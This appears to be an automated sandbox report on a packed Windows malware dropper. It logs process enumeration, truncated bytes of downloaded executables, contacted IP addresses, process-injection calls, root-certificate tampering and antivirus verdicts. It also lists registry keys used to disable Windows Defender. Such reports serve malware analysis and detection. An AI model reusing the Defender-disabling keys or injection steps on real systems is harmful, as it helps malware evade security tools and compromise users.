Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: lsm.exe process_identifier: 460	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 560	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 636	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 716	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 780	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 824	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: audiodg.exe process_identifier: 896	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 984	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 340	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: spoolsv.exe process_identifier: 1060	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: taskhost.exe process_identifier: 1112	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: dwm.exe process_identifier: 1192	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: svchost.exe process_identifier: 1744	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: pw.exe process_identifier: 1888	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: SearchIndexer.exe process_identifier: 1652	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: mobsync.exe process_identifier: 1552	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: pw.exe process_identifier: 288	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: taskhost.exe process_identifier: 2004	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: SearchProtocolHost.exe process_identifier: 496	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: cmd.exe process_identifier: 300	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: conhost.exe process_identifier: 1960	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: SearchFilterHost.exe process_identifier: 808	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: WWW14_64.exe process_identifier: 1460	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: pw.exe process_identifier: 1952	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: svchost.exe process_identifier: 2304	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: mscorsvw.exe process_identifier: 2332	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: mscorsvw.exe process_identifier: 2372	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: sppsvc.exe process_identifier: 2424	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: LCfgNNO96dWppNu7PMj50Yzc.exe process_identifier: 2732	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: nbHH0jE8qZJ4tNguvouaT8ug.exe process_identifier: 2740	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: cikl6UFkXU4cZQ6sFNhet5qr.exe process_identifier: 2748	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: jO0KmIb4n4ZjS9AOGznw9fMl.exe process_identifier: 2892	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: ldEQBC8aeCgL1Jw4jA1tloQg.exe process_identifier: 2916	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: 0Sg4p2isyE32UOnHiUlFNypw.exe process_identifier: 2924	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: z0cXWJOzi1YW10CuQRQjMRie.exe process_identifier: 2932	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: ZcWmEJj67YVTAJcMEmzlUq_H.exe process_identifier: 2968	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: regsvr32.exe process_identifier: 2140	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: inject-x86.exe process_identifier: 2012	1	1
Process32NextW Sept. 14, 2023, 7:16 p.m.	snapshot_handle: 0x00000000000003ac process_name: cmd.exe process_identifier: 1656	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 14, 2023, 7:14 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process www14_64.exe (3 events)

Time & API	Arguments	Status	Return
InternetReadFile Sept. 14, 2023, 7:14 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $}j9íJ9íJ9íJ0sxJ8íJ0siJ?íJ0s~J"íJ9ìJ; íJ0snJ/íJ0sgJ2íJ0syJ8íJ0s\|J8íJRich9íJPEdÄÇ[Jð" Ærpp ±@ üÂXQð `¨À°p.textÅÆ `.dataÀàÊ@À.pdata ð Ð@@.rsrc`RÚ@@.reloc`,@BkÞ[Jxßß[Jß[Jà[Juß[J§¾ß[J²+à[J½gÞ[JÇà[JÔÔß[JÞà[JëhÞ[Jöà[JTà[JADVAPI32.dllKERNEL32.dllGDI32.dllUSER32.dllMFC42u.dllmsvcrt.dllNTDLL.DLLCOMCTL32.dllole32.dllnetutils.dllsrvcli.dllACLUI.dllWS2_32.dllSHELL32.dllJÿÐÂòÿóÿ¸òÿµòÿ¼µòÿä´òÿµòÿðóÿ¨©ñÿ<¶òÿÔÞñÿñÿ$Çñÿ8ÇñÿÄòÿ µòÿ°<óÿðµòÿ¼ï#zÿø[$zÿÜ3zÿ4h×ÿð&×ÿ×ÿÅÒx þÓx`pÒx°bÓxáÒx`.ÓxÐbÓxÀÅÖx`MÓxp4Ôxð\ÓxÀÔxpoÒx¼Öx0»ÖxÐºÖx ÛxþÓx°ÁÖx°ÔxàÔx°ïÓxÀÔx0õÙx°SÓxPóÒx@)Ôxà(ÔxÐÔxÓx4ÔxÔxp(ÔxÐ\Óx ÔxøÅQxÿp°Qxÿ,ÁQxÿ°Qxÿà¿Qxÿg\xÿ4ÄQxÿ´Qxÿ°³Qxÿ0\xÿTxÿTxÿÔÖQxÿðÊZxÿðÊZxÿðÊZxÿTxÿXTxÿTxÿPTxÿXxÿ@8YxÿÔÖQxÿðÊZxÿðÊZxÿðÊZxÿ¤ÐUxÿ ËUxÿÏUxÿxÒUxÿÔÈUxÿlÇQxÿ´ÑUxÿÍUxÿpÏUxÿÈUxÿ\ÖUxÿ<ÖUxÿ¥\xÿÖUxÿÐ×Uxÿ ÕUxÿÀÖUxÿ¤®Qxÿ ]^xÿÄ TxÿíSxÿ ]^xÿð×SxÿàöQxÿèQxÿ¼TxÿTxÿpñSxÿTxÿÐQxÿ¸TxÿüQxÿQxÿ@Txÿ`ûSxÿàóQxÿpwZxÿ request_handle: 0x0000000000cc0078	1	1
InternetReadFile Sept. 14, 2023, 7:14 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ù=LF¸SF¸SF¸Sò$¢K¸Sò$ Ë¸Sò$¡^¸SÆÃ®D¸SÆÃWU¸SÆÃPQ¸SÆÃVt¸SOÀÐM¸SOÀÀA¸SF¸RN¹SÈÃV`¸SÈÃSG¸SÈÃ¬G¸SÈÃQG¸SRichF¸SPELf¡¹dà!~à]@À@Á04dP°øßT)@T8³@,\ .text}~ `.rdataæ¦¨@@.data \@@À.didatx :@À.rsrcøß°à<@@.relocT)@BhOCè%ÃÌÌÌÌÌh Bè¯IYÃÌÌÌÌèèZ£8àCÃÌÌÌÌÌ¹HàCéUiÌÌÌÌÌÌ¹PåCèbßh°BèuIYÃÌÌÌÌÌÌÌÌÌÌ¹øaFèéFhÀBèUIYÃÌÌÌÌÌÌÌÌÌÌ¹EéÑÌÌÌÌÌÌ¹°Eè¡)hÐBè%IYÃÌÌÌÌÌÌÌÌÌÌ¹EèFhàBèIYÃÌÌÌÌÌÌÌÌÌÌ¹®EèhðBèåHYÃÌÌÌÌÌÌÌÌÌÌhBèÏHYÃÌÌÌÌUìì,EüVPÿ\| FÀu`E3ÉEÜÔýÿÿEäEEèEÜPMàÇEìAMðMôÿl Fðöt)SÿuVÿp FMüÀVQÃrÎÿ,BÿÖÃ[ë2À^ÉÂÌÂ¶D$Pÿt$ÿt$ÿL¡FPÿH¡FÂ¶D$÷ØÀà Pÿt$ÿt$ÿL¡FPÿX¡FÂUì}0tY}u]E ¹°E$¶ÀPÿuÿuè6öE t>ÿuÿ@¡FÀt1h!0PÿL¡FÀt!öE thBPÿD¡Fë ÿu¹°Eè62À]ÂUìE=rEPEPè`EPÿuèøCYY]Â¸Bè÷CQVñWuðè§²èW3ÿ`²}üèøV¼²ÆEüèéV³ÆEüèÚVt³ÆEüèËVÐ³ÆEüè~D¾à³¾ä³¾è³ÎÆEüèMôÆ_^d ÉÃ9tÿ1èkYÃéÅéèÿÿÿÁ³éW¸ èaCSUVWjjÿ´$( è{$ Øè·W½é¢D$Pè%ð·Qè_$¼$ tÀt3ÀfëÀtUhBD$PèUjjD$ûPèðf>*u:·NQè$Àt,j.Xj\f$XUf$$SPèxU¼$ÿ´$( WVèÀu'$ request_handle: 0x0000000000cc003c	1	1
InternetReadFile Sept. 14, 2023, 7:14 p.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $z?d>^ Q>^ Q>^ Q Q&^ Q Q^ Q Q¹^ QqQ5^ Q>^Q@^ Q Q?^ Q Q?^ Q Q?^ QRich>^ QPEL¬5µcà <AâKPA@PCAEì>Ax@@àDZD B@ø:@Ü.text:A<A `.datadèþPA"@A@À.rsrcàD@@FbA@@.reloc°B²¨C@B4EAþDAEA AA°AAÈAAÜAAúAABA BA<BANBA^BArBABA¦BAÀBAÖBAèBAúBACA"CA@CARCAbCAAACACA²CA¾CAÊCAÞCAøCADA"DA<DAPDA JAúIAäIAÔIAÂIAAARAA`AArCA@AA®IApEAEAEA´EAÊEAÒEAîEAFAFA6FAFFARFAfFAFA FA´FAÆFAØFAäFAðFAGAGA"GA.GA<GAJGAXGAlGAzGAGAGAGA´GAÆGAÔGAàGAðGAHA HA8HARHAdHArHAHAHA²HAÌHAÞHAêHAôHAIAIA.IADIATIA\|IAIAIAvDAÜDAÎDA¸DA¦DADADAREAç0ý01Û0ä@Ã@Uç@6&APZAêu@Áð@ÚA1Ä@~ZÏd2X;X/bad allocationÿÿÿÿB@]D@ z@è=@5I@¸;@6q@*CÌ>@¾E@¶E@\|>@F@¶E@<@s@¶E@string too longinvalid string positionT<@\z@ z@Unknown exceptionh<@}z@ z@ð?ð?33ð¿0Cÿ´<@Ó@csmà LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALLÀ@@´@XWnA¨@XWà@@XW¨A@XW request_handle: 0x0000000000cc0060	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0075f800', u'virtual_address': u'0x0079d000', u'entropy': 7.943166872330778, u'name': u'.vmp2', u'virtual_size': u'0x0075f72c'}

entropy

7.94316687233

description

A section with a high entropy has been found

entropy

0.982816974746

description

Overall entropy of this PE file is high

Expresses interest in specific running processes (2 events)

process	www14_64.exe
process	jo0kmib4n4zjs9aogznw9fml.exe

Yara rule detected in process memory (18 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Communications smtp	rule	Network_SMTP_dotNet
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

The executable is likely packed with VMProtect (3 events)

section	.vmp0	description	Section name indicates VMProtect
section	.vmp1	description	Section name indicates VMProtect
section	.vmp2	description	Section name indicates VMProtect

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: a418aea92de23ff7cb8d878f95d2ec026d89c636

Communicates with host for which no DNS query was performed (6 events)

host	176.123.9.85
host	185.225.73.32
host	185.225.74.51
host	193.42.32.118
host	45.15.156.229
host	45.9.74.80

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 14, 2023, 7:16 p.m.	process_identifier: 1960 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000004c	1	0	0

Drops a binary and executes it (8 events)

file	C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
file	C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
file	C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
file	C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
file	C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
file	C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
file	C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
file	C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 14, 2023, 7:16 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1960 process_handle: 0x0000004c	1	1	0

File has been identified by 11 AntiVirus engines on VirusTotal as malicious (11 events)

Bkav	W32.AIDetectMalware.64
Elastic	malicious (high confidence)
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/Packed.VMProtect.J suspicious
APEX	Malicious
McAfee-GW-Edition	BehavesLike.Win64.Generic.wc
FireEye	Generic.mg.24fbc8705072bb32
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
MaxSecure	Trojan.Malware.300983.susgen
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_70% (D)

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	WWW14_64.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process	nbHH0jE8qZJ4tNguvouaT8ug.exe				useragent	HTTPREAD

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2932 called NtSetContextThread to modify thread in remote process 1960
NtSetContextThread Sept. 14, 2023, 7:16 p.m.	registers.eip: 2005598660 registers.esp: 6618964 registers.edi: 0 registers.eax: 4510638 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000048 process_identifier: 1960	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2732 resumed a thread in remote process 2140
Process injection	Process 2932 resumed a thread in remote process 1960
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 2140	1	0	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000048 suspend_count: 1 process_identifier: 1960	1	0	0

Generates some ICMP traffic

Disables Windows Security features (20 events)

description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{B1041C16-8CED-4E0B-B3A5-89D3C1F728EC}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{001D9473-601C-4AEF-8FF7-40AF90326016}Machine\Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions\exe

Executed a process and injected code into it, probably while unpacking (44 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 14, 2023, 7:15 p.m.	thread_identifier: 2744 thread_handle: 0x0000000000000934 process_identifier: 2740 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000930	1	1
CreateProcessInternalW Sept. 14, 2023, 7:15 p.m.	thread_identifier: 2736 thread_handle: 0x0000000000000920 process_identifier: 2732 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000928	1	1
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 2752 thread_handle: 0x00000000000008f8 process_identifier: 2748 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000908	1	1
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 2896 thread_handle: 0x0000000000000bac process_identifier: 2892 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000bdc	1	1
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 2920 thread_handle: 0x000000000000099c process_identifier: 2916 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000bfc	1	1
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 2936 thread_handle: 0x0000000000000c2c process_identifier: 2932 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000009b0	1	1
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 2928 thread_handle: 0x0000000000000c14 process_identifier: 2924 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000c18	1	1
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 2972 thread_handle: 0x0000000000000750 process_identifier: 2968 current_directory: C:\Users\test22\Pictures\Minor Policy filepath: C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe track: 1 command_line: "C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe" filepath_r: C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000578	1	1
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2740	1	0
